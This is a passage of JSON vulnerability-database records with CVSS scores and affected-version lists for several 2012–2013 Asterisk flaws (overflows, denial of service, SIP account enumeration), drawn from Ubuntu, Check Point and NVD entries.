"https://ubuntu.com/security/CVE-2012-5976", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:22:58", "description": "Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk\nOpen Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before\n11.6.1; Asterisk with Digiumphones 10.x-digiumphones before\n10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and\n11.x before 11.2-cert3 allows remote attackers to cause a denial of service\n(daemon crash) via a 16-bit SMS message with an odd number of bytes, which\ntriggers an infinite loop.", "cvss3": {}, "published": "2013-12-19T00:00:00", "type": "ubuntucve", "title": "CVE-2013-7100", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2013-12-19T00:00:00", "id": "UB:CVE-2013-7100", "href": "https://ubuntu.com/security/CVE-2013-7100", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:25:44", "description": "Stack-based buffer overflow in res/res_format_attr_h264.c in Asterisk Open\nSource 11.x before 11.2.2 allows remote attackers to execute arbitrary code\nvia a long sprop-parameter-sets H.264 media attribute in a SIP Session\nDescription Protocol (SDP) header.", "cvss3": {}, "published": "2013-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2685", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2013-04-01T00:00:00", "id": "UB:CVE-2013-2685", "href": "https://ubuntu.com/security/CVE-2013-2685", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:25:45", "description": "The SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x\nbefore 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before\n1.8.15-cert2; Asterisk Business Edition (BE) C.3.x before C.3.8.1; and\nAsterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones\nexhibits different behavior for invalid INVITE, SUBSCRIBE, and REGISTER\ntransactions depending on whether the user account exists, which allows\nremote attackers to enumerate account names by (1) reading HTTP status\ncodes, (2) reading additional text in a 403 (aka Forbidden) response, or\n(3) observing whether certain retransmissions occur.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=704114>\n", "cvss3": {}, "published": "2013-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2264", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264"], "modified": "2013-04-01T00:00:00", "id": "UB:CVE-2013-2264", "href": "https://ubuntu.com/security/CVE-2013-2264", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:16:24", "description": "A stack overflow vulnerability has been reported in Digium Asterisk. The vulnerability is due to an unchecked memory allocation on the stack, which can result in a stack overflow or writing of attacker-controlled data to arbitrary memory locations. A remote attacker can use this vulnerability by sending a malicious request to a vulnerable Asterisk server.", "cvss3": {}, "published": "2013-01-20T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk HTTP Management Interface Stack Overflow (CVE-2012-5976; CVE-2013-2686)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2013-2686"], "modified": "2013-11-25T00:00:00", "id": "CPAI-2013-029", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-11-28T06:59:26", "description": "A denial of service vulnerability exists in Asterisk Open Source, Certified Asterisk and Asterisk with Digiumphones.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk SIP Invalid SDP Media Descriptions Denial of Service (CVE-2013-5642)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5642"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-2961", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:01:13", "description": "A denial of service vulnerability exists in Asterisk Open Source and Certified Asterisk.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk SIP Terminated Channel ACK with SDP Denial of Service (CVE-2013-5641)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5641"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-3492", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T06:59:23", "description": "A buffer overflow vulnerability exists in Asterisk Open Source.", "cvss3": {}, "published": "2013-06-30T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk SIP SDP Header Parsing Stack Buffer Overflow (CVE-2013-2685)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-2685"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-1661", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T12:38:08", "description": "main/http.c in the HTTP server in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones does not properly restrict Content-Length values, which allows remote attackers to conduct stack-consumption attacks and cause a denial of service (daemon crash) via a crafted HTTP POST request. NOTE: this vulnerability exists because of an incorrect fix for CVE-2012-5976.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "cve", "title": "CVE-2013-2686", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2013-2686"], "modified": "2013-04-01T16:55:00", "cpe": ["cpe:/a:asterisk:open_source:11.0.2", "cpe:/a:asterisk:digiumphones:10.6.0", "cpe:/a:asterisk:open_source:1.8.7.2", "cpe:/a:asterisk:open_source:1.8.9.2", "cpe:/a:asterisk:open_source:1.8.3.2", "cpe:/a:asterisk:open_source:10.1.0", "cpe:/a:asterisk:open_source:1.8.18.0", "cpe:/a:asterisk:open_source:11.2.0", "cpe:/a:asterisk:digiumphones:10.12.1", "cpe:/a:asterisk:open_source:1.8.14.1", "cpe:/a:asterisk:open_source:10.1.1", "cpe:/a:asterisk:open_source:1.8.16.0", "cpe:/a:asterisk:open_source:1.8.10.0", "cpe:/a:asterisk:open_source:1.8.4.1", "cpe:/a:asterisk:digiumphones:10.11.0", "cpe:/a:asterisk:open_source:10.0.0", "cpe:/a:asterisk:open_source:1.8.1", "cpe:/a:asterisk:digiumphones:10.0.0", "cpe:/a:asterisk:digiumphones:10.3.0", "cpe:/a:asterisk:digiumphones:10.2.0", "cpe:/a:asterisk:open_source:1.8.4.2", "cpe:/a:asterisk:open_source:1.8.7.0", "cpe:/a:asterisk:digiumphones:10.9.0", "cpe:/a:asterisk:open_source:11.0.0", "cpe:/a:asterisk:open_source:10.2.0", "cpe:/a:asterisk:open_source:10.5.0", "cpe:/a:asterisk:open_source:11.2.1", "cpe:/a:asterisk:open_source:10.4.1", "cpe:/a:asterisk:open_source:1.8.4.4", "cpe:/a:asterisk:open_source:1.8.4", "cpe:/a:asterisk:open_source:1.8.2", "cpe:/a:asterisk:open_source:11.1.1", "cpe:/a:asterisk:open_source:1.8.3.1", "cpe:/a:asterisk:open_source:10.1.2", "cpe:/a:asterisk:open_source:1.8.8.0", "cpe:/a:asterisk:open_source:1.8.3", "cpe:/a:asterisk:open_source:1.8.12", "cpe:/a:asterisk:open_source:11.1.0", "cpe:/a:asterisk:open_source:1.8.5", "cpe:/a:asterisk:open_source:1.8.7.1", "cpe:/a:asterisk:open_source:1.8.19.1", "cpe:/a:asterisk:open_source:1.8.11.0", "cpe:/a:asterisk:open_source:1.8.3.3", "cpe:/a:asterisk:open_source:1.8.2.4", "cpe:/a:asterisk:open_source:1.8.15.0", "cpe:/a:asterisk:digiumphones:10.10.0", "cpe:/a:asterisk:open_source:1.8.20.1", "cpe:/a:asterisk:open_source:10.3.1", "cpe:/a:asterisk:open_source:1.8.1.1", "cpe:/a:asterisk:open_source:10.9.0", "cpe:/a:asterisk:open_source:1.8.2.3", "cpe:/a:asterisk:open_source:10.7.1", "cpe:/a:asterisk:open_source:1.8.8.1", "cpe:/a:asterisk:open_source:10.6.0", "cpe:/a:asterisk:open_source:1.8.9.1", "cpe:/a:asterisk:digiumphones:10.1.0", "cpe:/a:asterisk:open_source:10.5.1", "cpe:/a:asterisk:open_source:10.8.0", "cpe:/a:asterisk:open_source:1.8.11.1", "cpe:/a:asterisk:open_source:10.11.0", "cpe:/a:asterisk:open_source:10.12.1", "cpe:/a:asterisk:open_source:1.8.4.3", "cpe:/a:asterisk:open_source:1.8.12.2", "cpe:/a:asterisk:open_source:1.8.1.2", "cpe:/a:asterisk:open_source:1.8.10.1", "cpe:/a:asterisk:open_source:1.8.12.1", "cpe:/a:asterisk:open_source:1.8.8.2", "cpe:/a:asterisk:open_source:10.11.1", "cpe:/a:asterisk:open_source:1.8.12.0", "cpe:/a:asterisk:open_source:1.8.18.1", "cpe:/a:asterisk:open_source:1.8.5.0", "cpe:/a:asterisk:open_source:10.2.1", "cpe:/a:asterisk:open_source:1.8.15.1", "cpe:/a:asterisk:open_source:1.8.14.0", "cpe:/a:asterisk:open_source:10.10.0", "cpe:/a:asterisk:digiumphones:10.4.0", "cpe:/a:asterisk:certified_asterisk:1.8.15.0", "cpe:/a:asterisk:open_source:10.1.3", "cpe:/a:asterisk:open_source:1.8.13.0", "cpe:/a:asterisk:digiumphones:10.12.0", "cpe:/a:asterisk:open_source:10.4.2", "cpe:/a:asterisk:open_source:10.5.2", "cpe:/a:asterisk:open_source:1.8.13.1", "cpe:/a:asterisk:open_source:1.8.6.0", "cpe:/a:asterisk:digiumphones:10.8.0", "cpe:/a:asterisk:open_source:11.1.2", "cpe:/a:asterisk:digiumphones:10.7.0", "cpe:/a:asterisk:open_source:10.6.1", "cpe:/a:asterisk:open_source:1.8.9.3", "cpe:/a:asterisk:open_source:1.8.0", "cpe:/a:asterisk:certified_asterisk:1.8.15", "cpe:/a:asterisk:open_source:10.12.0", "cpe:/a:asterisk:open_source:1.8.17.0", "cpe:/a:asterisk:open_source:1.8.20.0", "cpe:/a:asterisk:open_source:1.8.2.2", "cpe:/a:asterisk:open_source:1.8.19.0", "cpe:/a:asterisk:open_source:1.8.2.1", "cpe:/a:asterisk:open_source:1.8.9.0", "cpe:/a:asterisk:open_source:10.4.0", "cpe:/a:asterisk:open_source:10.3.0", "cpe:/a:asterisk:open_source:11.0.1", "cpe:/a:asterisk:digiumphones:10.5.0", "cpe:/a:asterisk:open_source:10.0.1", "cpe:/a:asterisk:open_source:10.7.0", "cpe:/a:asterisk:open_source:10.10.1"], "id": "CVE-2013-2686", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2686", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:asterisk:open_source:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc3:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc2:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta2:*:*:*:*:*:*", 